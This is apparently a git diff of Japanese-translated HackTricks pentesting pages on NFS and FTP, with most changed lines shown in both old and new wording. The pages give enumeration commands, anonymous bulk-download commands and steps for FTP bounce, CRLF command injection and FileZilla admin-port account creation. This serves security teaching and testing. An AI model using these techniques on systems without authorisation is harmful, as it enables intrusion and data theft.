ファイルを簡単にリストアップ、マウント、UIDとGIDを変更してアクセスするためには、[nfsshell](https://github.com/NetDirect/nfsshell)を使用することができます。
ファイルにアクセスするために**UID**と**GID**を簡単にリストアップ、マウント、変更するには、[nfsshell](https://github.com/NetDirect/nfsshell)を使用できます。
[Nice NFSShell tutorial.](https://www.pentestpartners.com/security-blog/using-nfsshell-to-compromise-older-environments/)
[NFSShellの素敵なチュートリアル。](https://www.pentestpartners.com/security-blog/using-nfsshell-to-compromise-older-environments/)
## Config files
## 設定ファイル
```
/etc/exports
/etc/lib/nfs/etab
```
### 危険な設定
(From [https://academy.hackthebox.com/module/112/section/1068](https://academy.hackthebox.com/module/112/section/1068))
[https://academy.hackthebox.com/module/112/section/1068](https://academy.hackthebox.com/module/112/section/1068)より)
| **オプション** | **説明** |
| **オプション** | **説明** |
| ---------------- | -------------------------------------------------------------------------------------------------------------------- |
| `rw` | 読み書き権限を持つ。 |
| `insecure` | 1024以上のポートが使用される。 |
| `nohide` | エクスポートされたディレクトリの下に別のファイルシステムがマウントされている場合、このディレクトリは独自のエクスポートエントリでエクスポートされる。 |
| `no_root_squash` | rootによって作成されたすべてのファイルは、UID/GID 0で保持される。 |
| `rw` | 読み書き権限。 |
| `insecure` | 1024を超えるポートが使用されます。 |
| `nohide` | エクスポートされたディレクトリの下に別のファイルシステムがマウントされている場合、このディレクトリは独自のexportsエントリによってエクスポートされます。 |
| `no_root_squash` | rootによって作成されたすべてのファイルは、UID/GID 0で保持されます。 |
| `no_all_squash` | |
## NFSの設定ミスを利用した特権昇格
## NFSミス構成を利用した特権昇格
[NFS no\_root\_squashとno\_all\_squashの特権昇格](../linux-hardening/privilege-escalation/nfs-no\_root\_squash-misconfiguration-pe.md)
[NFS no\_root\_squashおよびno\_all\_squash特権昇格](../linux-hardening/privilege-escalation/nfs-no\_root_squash-misconfiguration-pe.md)
## HackTricks自動コマンド
```
@ -167,12 +127,12 @@ Command: nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 {IP}
```
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください、私たちの独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクション
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で私を**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **ハッキングトリックを共有するに、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか?**HackTricksで会社を宣伝**したいですか?または**最新版のPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションです。
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>

196
network-services-pentesting/pentesting-ftp/README.md
View file

@ -2,19 +2,19 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**PEASSの最新バージョンにアクセス**したいですか、または**HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけてください
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出**してください。
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
最も重要な脆弱性を見つけて、より速く修正できるようにしましょう。Intruderは、攻撃対象の範囲を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリ、クラウドシステムまで技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)。
重要な脆弱性を見つけて修正を迅速化します。Intruderは攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリ、クラウドシステムまで技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)。
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -22,74 +22,36 @@
## 基本情報
**ファイル転送プロトコルFTP**は、コンピュータネットワーク上のクライアントとサーバー間でコンピュータファイルを転送するために使用される標準的なネットワークプロトコルです。\
これは**プレーンテキスト**プロトコルであり、**改行文字`0x0d 0x0a`**を使用するため、**`telnet`**または**`nc -C`**を使用して接続する必要がある場合があります。
**ファイル転送プロトコルFTP**は、コンピュータネットワーク上のクライアントとサーバー間でコンピュータファイルを転送するために使用される標準ネットワークプロトコルです。\
**プレーンテキスト**プロトコルであり、**改行文字`0x0d 0x0a`**を使用するため、**`telnet`**または**`nc -C`**を使用して接続する必要があることがあります。
**デフォルトポート** 21
**デフォルトポート:** 21
```
PORT STATE SERVICE
21/tcp open ftp
```
### 接続のアクティブとパッシブ
**アクティブFTP**では、FTP **クライアント**は最初にポートNからFTPサーバーのコマンドポートポート21への制御**接続**を**初期化**します。その後、**クライアント**はポート**N+1**で**リッスン**し、ポートN+1をFTPサーバーに送信します。FTP **サーバー**は、FTPクライアントのポートN+1へのデータ**接続**を**初期化**します。
**アクティブFTP**では、FTP **クライアント**はまず、ポートNからFTPサーバーのコマンドポートポート21への制御**接続**を**初期化**します。その後、**クライアント**はポート**N+1**で**リッスン**し、ポートN+1をFTPサーバーに送信します。FTP **サーバー**はその後**ポートMからFTPクライアントのポートN+1**へのデータ**接続**を**初期化**します。
ただし、FTPクライアントに外部からの着信データ接続を制御するファイアウォールが設定されている場合、アクティブFTPは問題になる可能性があります。そのため、パッシブFTPは実現可能な解決策です。
ただし、FTPクライアントに外部からの着信データ接続を制御するファイアウォールが設定されている場合、アクティブFTPは問題となる可能性があります。そのための実現可能な解決策がパッシブFTPです。
**パッシブFTP**では、クライアントはポートNからFTPサーバーのポート21への制御接続を初期化します。その後、クライアントは**passvコマンド**を発行します。サーバーはクライアントに自身のポート番号Mのいずれかを送信します。そして、**クライアント**はFTPサーバーのポートMへのデータ**接続**を**初期化**します。
**パッシブFTP**では、クライアントはポートNからFTPサーバーのポート21への制御接続を初期化します。その後、クライアントは**passvコマンド**を発行します。サーバーはクライアントに自身のポート番号Mのいずれかを送信します。そして、**クライアント**は**ポートPからFTPサーバーのポートM**へのデータ**接続**を**初期化**します。
ソース[https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/](https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/)
ソース: [https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/](https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/)
### 接続のデバッグ
**FTP**コマンド**`debug`**と**`trace`**を使用すると、**通信の方法**を確認できます。
**FTP**コマンド**`debug`**と**`trace`**を使用して、**通信がどのように行われているか**を確認できます。
## 列挙
### バナーグラビング
### バナーの取得
```bash
nc -vn <IP> 21
openssl s_client -connect crossfit.htb:21 -starttls ftp #Get certificate if any
```
### Starttlsを使用してFTPに接続する
To connect to an FTP server using Starttls, you can follow the steps below:
1. Open a terminal or command prompt and type the following command:
```
ftp <hostname>
```
Replace `<hostname>` with the hostname or IP address of the FTP server you want to connect to.
2. Once connected, you will see the FTP prompt. Type the following command to enable Starttls:
```
prot p
```
This command sets the data channel protection level to private.
3. Next, type the following command to initiate the Starttls negotiation:
```
ccc
```
This command switches the FTP control connection to plaintext.
4. Finally, type the following command to secure the control connection using Starttls:
```
auth tls
```
This command enables Starttls on the control connection.
5. You are now connected to the FTP server using Starttls. You can proceed with any FTP commands you need to execute.
Note: Make sure the FTP server supports Starttls before attempting to connect using this method.
### FTPをstarttlsを使用して接続する
```
lftp
lftp :~> set ftp:ssl-force true
@ -99,13 +61,13 @@ lftp 10.10.10.208:~> login
Usage: login <user|URL> [<pass>]
lftp 10.10.10.208:~> login username Password
```
### 認証列挙
### 認証なし列挙
**nmap**を使用してください。
**nmap**を使用して
```bash
sudo nmap -sV -p21 -sC -A 10.10.10.10
```
FTPサーバーの情報を取得するために、`HELP`コマンドと`FEAT`コマンドを使用することができます。
以下のコマンドを使用して、FTPサーバーの情報を取得できます`HELP`および`FEAT`
```
HELP
214-The following commands are recognized (* =>'s unimplemented):
@ -155,83 +117,83 @@ ftp <IP>
>ascii #Set transmission to ascii instead of binary
>bye #exit
```
### [ブルートフォース](../../generic-methodologies-and-resources/brute-force.md#ftp)
### [Brute force](../../generic-methodologies-and-resources/brute-force.md#ftp)
ここでは、デフォルトのFTP資格情報の素敵なリストを見つけることができます: [https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt)
ここでは、デフォルトのFTP資格情報の素敵なリストを見つけることができます: [https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt)
### 自動化
### Automated
匿名ログインとバウンスFTPチェックは、nmapの**-sC**オプションまたは次のようにデフォルトで実行されます:
匿名ログインとバウンスFTPチェックは、nmapが**-sC**オプションまたはデフォルトで実行します。
```bash
nmap --script ftp-* -p 21 <ip>
```
## ブラウザ接続
ブラウザFirefoxを使用して、次のようなURLを使用してFTPサーバーに接続することができます:
FTPサーバーには、Firefoxなどのブラウザを使用して次のようなURLを使用して接続できます:
```bash
ftp://anonymous:anonymous@10.10.10.98
```
注意してください、もし**ウェブアプリケーション**がユーザーによって制御されたデータを**直接FTPサーバー**に送信している場合、ダブルURLエンコード`%0d%0a`ダブルURLエンコードでは`%250d%250a`)バイトを送信して**FTPサーバーに任意のアクションを実行**させることができます。この可能な任意のアクションの一つは、ユーザーが制御するサーバーからコンテンツをダウンロードしたり、ポートスキャンを実行したり、他のプレーンテキストベースのサービス(例えばhttpと通信を試みることです。
注意してください。**Webアプリケーション**がユーザーによって制御されたデータを**直接FTPサーバーに送信**している場合、ダブルURLエンコード`%0d%0a`ダブルURLエンコードでは`%250d%250a`となります)バイトを送信して**FTPサーバーに任意のアクションを実行**させることができます。これらの任意のアクションの1つは、ユーザーが制御するサーバーからコンテンツをダウンロードしたり、ポートスキャンを実行したり、他のプレーンテキストベースのサービス(例httpと通信を試みることです。
## FTPからすべてのファイルをダウンロードする
## FTPからすべてのファイルをダウンロード
```bash
wget -m ftp://anonymous:anonymous@10.10.10.98 #Donwload all
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 #Download all
```
ユーザー名/パスワードに特殊文字が含まれている場合、[次のコマンド](https://stackoverflow.com/a/113900/13647948)を使用できます:
もしユーザー名/パスワードに特殊文字が含まれている場合、[次のコマンド](https://stackoverflow.com/a/113900/13647948) を使用できます:
```bash
wget -r --user="USERNAME" --password="PASSWORD" ftp://server.com/
```
## いくつかのFTPコマンド
* **`USER ユーザー名`**
* **`PASS パスワード`**
* **`HELP`** サーバーはサポートされているコマンドを示します
* **`PORT 127,0,0,1,0,80`** これにより、FTPサーバーにIPアドレス127.0.0.1のポート80で接続するよう指示します5番目の文字を「0」、6番目を10進数でポートを表すか、5番目と6番目を使用してポートを16進数で表す必要があります)。
* **`EPRT |2|127.0.0.1|80|`** これにより、FTPサーバーにIPアドレス127.0.0.1のポート80でTCP接続「2」で示されるを確立するよう指示します。このコマンドは**IPv6をサポート**しています。
* **`LIST`** 現在のフォルダ内のファイルリストを送信します
* **`LIST -R`** 再帰的にリストします(サーバーが許可している場合)
* **`APPE /path/something.txt`** これによりFTPが**パッシブ**接続または**PORT/EPRT**接続から受信したデータをファイルに保存するようFTPに指示します。ファイル名が存在する場合、データを追加します。
* **`STOR /path/something.txt`** `APPE`と同様ですが、ファイルを上書きします
* **`STOU /path/something.txt`** `APPE`と同様ですが、存在する場合は何もしません。
* **`RETR /path/to/file`** パッシブまたはポート接続を確立する必要があります。その後、FTPサーバーはその接続を介して指定されたファイルを送信します
* **`REST 6`** これにより、次回`RETR`を使用して何かを送信するときに、サーバーに対して6番目のバイトから開始するよう指示します。
* **`TYPE i`** 転送をバイナリに設定します
* **`PASV`** パッシブ接続を開き、ユーザーが接続できる場所を示します
* **`PUT /tmp/file.txt`** 指定されたファイルをFTPにアップロードします
- **`USER ユーザー名`**
- **`PASS パスワード`**
- **`HELP`** サーバーはサポートされているコマンドを示します
- **`PORT 127,0,0,1,0,80`** これによりFTPサーバーがIP 127.0.0.1のポート80に接続するよう指示されます第5文字を "0" とし、第6文字を10進数のポートにするか、第5文字と第6文字を使用して16進数でポートを表現します)。
- **`EPRT |2|127.0.0.1|80|`** これによりFTPサーバーがIP 127.0.0.1のポート80にTCP接続"2"で示される)を確立するよう指示されます。このコマンドは**IPv6をサポート**しています。
- **`LIST`** 現在のフォルダ内のファイルリストを送信します
- **`LIST -R`** 再帰的にリストします(サーバーが許可する場合)
- **`APPE /path/something.txt`** これによりFTPが**パッシブ**接続または**PORT/EPRT**接続から受信したデータをファイルに保存するよう指示されます。ファイル名が存在する場合、データが追加されます。
- **`STOR /path/something.txt`** `APPE`と同様ですが、ファイルを上書きします
- **`STOU /path/something.txt`** `APPE`と同様ですが、存在する場合は何もしません。
- **`RETR /path/to/file`** パッシブまたはポート接続を確立する必要があります。その後、FTPサーバーはその接続を介して指定されたファイルを送信します
- **`REST 6`** これにより、サーバーに次回`RETR`を使用して何かを送信する際に、6番目のバイトから開始するように指示されます。
- **`TYPE i`** 転送をバイナリに設定します
- **`PASV`** パッシブ接続を開き、ユーザーが接続できる場所を示します
- **`PUT /tmp/file.txt`** 指定されたファイルをFTPにアップロードします
![](<../../.gitbook/assets/image (227).png>)
## FTPBounce攻撃
一部のFTPサーバーでは、PORTコマンドを許可しています。このコマンドを使用して、FTPサーバーを介してホストのどのポートが開いているかをスキャンすることができます。
一部のFTPサーバーは`PORT`コマンドを許可しています。このコマンドを使用して、FTPサーバーにホストのどのポートが開いているかをスキャンできます。
[**ここでFTPサーバーを悪用してポートをスキャンする方法を学びましょう。**](ftp-bounce-attack.md)
[**こちらでFTPサーバーを悪用してポートをスキャンする方法を学んでください。**](ftp-bounce-attack.md)
また、この動作を悪用してFTPサーバーを他のプロトコルと対話させることもできます。HTTPリクエストを含むファイルをアップロードし、脆弱なFTPサーバーにそれを任意のHTTPサーバーに送信させたとえば新しい管理者ユーザーを追加するか、FTPリクエストをアップロードし、脆弱なFTPサーバーに別のFTPサーバーからファイルをダウンロードさせることができます。\
理論は簡単です
また、この動作を悪用してFTPサーバーを他のプロトコルとやり取りさせることもできます。HTTPリクエストを含むファイルをアップロードし、脆弱なFTPサーバーにそれを任意のHTTPサーバーに送信させたり_新しい管理者ユーザーを追加するかもしれません?_、FTPリクエストをアップロードして脆弱なFTPサーバーに異なるFTPサーバーからファイルをダウンロードさせたりできます。\
理論は簡単です:
1. **脆弱なサーバーにリクエスト(テキストファイル内)をアップロードします。**他のHTTPまたはFTPサーバーと通信する場合は、`0x0d 0x0a`で行を変更する必要があります
2. **送信したくない文字を送信しないようにするために、`REST X`を使用します**(おそらくリクエストをファイルの先頭に画像ヘッダーを追加する必要がある場合など)。
3. **`PORT`を使用して任意のサーバーとサービスに接続します**
4. **`RETR`を使用して保存されたリクエストをサーバーに送信します**
1. **リクエスト(テキストファイル内)を脆弱なサーバーにアップロードします。** 別のHTTPまたはFTPサーバーと通信する場合は、`0x0d 0x0a`で行を変更する必要があります
2. **送信したくない文字を送信しないようにするために`REST X`を使用します**(たとえば、ファイル内にリクエストをアップロードするために、最初に画像ヘッダーを配置する必要があるかもしれません)
3. **任意のサーバーとサービスに接続するために`PORT`を使用します**
4. **保存されたリクエストをサーバーに送信するために`RETR`を使用します**
これにより、**「ソケットが書き込み不可」**などのエラーが発生する可能性が非常に高いです**`RETR`でデータを送信するための接続が十分に続かないため)**。それを回避しようとするための提案は次のとおりです:
これはおそらく**「Socket not writable」のようなエラーを発生**させる可能性が高いです。**`RETR`でデータを送信するのに十分な接続がない**ためです。これを回避するための提案は次のとおりです:
* HTTPリクエストを送信する場合は、**少なくとも\~0.5MBまで**同じリクエストを繰り返し送信します。次のように:
- HTTPリクエストを送信している場合は、**少なくとも\~0.5MBまで同じリクエストを繰り返します**。次のように:
{% file src="../../.gitbook/assets/posts (1).txt" %}
posts.txt
{% endfile %}
* プロトコルに関連する「ジャンク」データでリクエストを**埋める**FTPに話しかける場合はジャンクコマンドだけまたは`RETR`命令を繰り返すことでファイルを取得する)
* 単に**ヌル文字やその他の文字でリクエストを埋める**(行ごとに分割するかどうか)
- プロトコルに関連する「ジャンク」データでリクエストを埋めるようにしますFTPに話しかける場合は、ジャンクコマンドまたは`RETR`命令を繰り返してファイルを取得する)
- リクエストを多くのヌル文字や他の文字で埋めるようにします(行ごとに分割されているかどうか)
とにかく、ここには[古い例があります。FTPサーバーが別のFTPサーバーからファイルをダウンロードするようにするためにこれを悪用する方法について](ftp-bounce-download-2oftp-file.md)説明されています。
とにかく、こちらには[FTPサーバーが異なるFTPサーバーからファイルをダウンロードするようにするためにこれを悪用する方法に関する古い例](ftp-bounce-download-2oftp-file.md)があります。
## Filezilla Serverの脆弱性
## Filezillaサーバーの脆弱性
**FileZilla**は通常、**FileZilla-Server**ポート14147**管理サービス**を**ローカルにバインド**します。このポートへのアクセスのために**自分のマシン**から**トンネル**を作成できれば、**空のパスワード**で**接続**し、FTPサービスのために**新しいユーザー**を作成することができます。
**FileZilla**は通常、**FileZilla-Server**ポート14147ための**ローカル**の**管理サービス**に**バインド**されます。自分のマシンからこのポートにアクセスするための**トンネル**を作成できれば、**空のパスワード**で**接続**し、FTPサービスのために**新しいユーザー**を**作成**できます。
## 設定ファイル
```
@ -242,32 +204,32 @@ vsftpd.conf
```
### ポストエクスプロイテーション
vsFTPdのデフォルト設定は`/etc/vsftpd.conf`にあります。ここにはいくつかの危険な設定があります:
vsFTPdのデフォルト構成は `/etc/vsftpd.conf` にあります。ここには、いくつかの危険な設定が見つかります:
* `anonymous_enable=YES`
* `anon_upload_enable=YES`
* `anon_mkdir_write_enable=YES`
* `anon_root=/home/username/ftp` - 匿名ユーザーのディレクトリ
* `chown_uploads=YES` - 匿名でアップロードされたファイルの所有権を変更する
* `chown_username=username` - 匿名でアップロードされたファイルの所有権を与えられるユーザー
* `local_enable=YES` - ローカルユーザーのログインを有効にする
* `no_anon_password=YES` - 匿名ユーザーにパスワードを要求しない
* `write_enable=YES` - STOR、DELE、RNFR、RNTO、MKD、RMD、APPE、SITEのコマンドを許可する
- `anonymous_enable=YES`
- `anon_upload_enable=YES`
- `anon_mkdir_write_enable=YES`
- `anon_root=/home/username/ftp` - 匿名ユーザーのディレクトリ
- `chown_uploads=YES` - 匿名でアップロードされたファイルの所有権を変更
- `chown_username=username` - 匿名でアップロードされたファイルの所有権を与えられるユーザー
- `local_enable=YES` - ローカルユーザーのログインを有効にする
- `no_anon_password=YES` - 匿名からのパスワードを要求しない
- `write_enable=YES` - コマンドを許可: STOR、DELE、RNFR、RNTO、MKD、RMD、APPE、およびSITE
### Shodan
* `ftp`
* `port:21`
- `ftp`
- `port:21`
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
最も重要な脆弱性を見つけて修正を迅速に行いましょう。Intruderは攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリまでクラウドシステム全体にわたる問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm_source=referral&utm_campaign=hacktricks)
最も重要な脆弱性を見つけて修正を迅速に行えます。Intruderは攻撃対象を追跡し、積極的な脅威スキャンを実行し、APIからWebアプリケーション、クラウドシステムまで、技術スタック全体で問題を見つけます。[**無料でお試しください**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) 今すぐ
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
***
***
## HackTricks自動コマンド
## HackTricks Automatic Commands
```
Protocol_Name: FTP #Protocol Abbreviation if there is one.
Port_Number: 21 #Comma separated if there is more than one.
@ -321,12 +283,12 @@ Command: msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS {IP};
```
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングトリックを共有するに、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか?**HackTricksで会社を宣伝**してみたいですか?または**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションです。
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>

60
network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md
View file

@ -2,44 +2,44 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
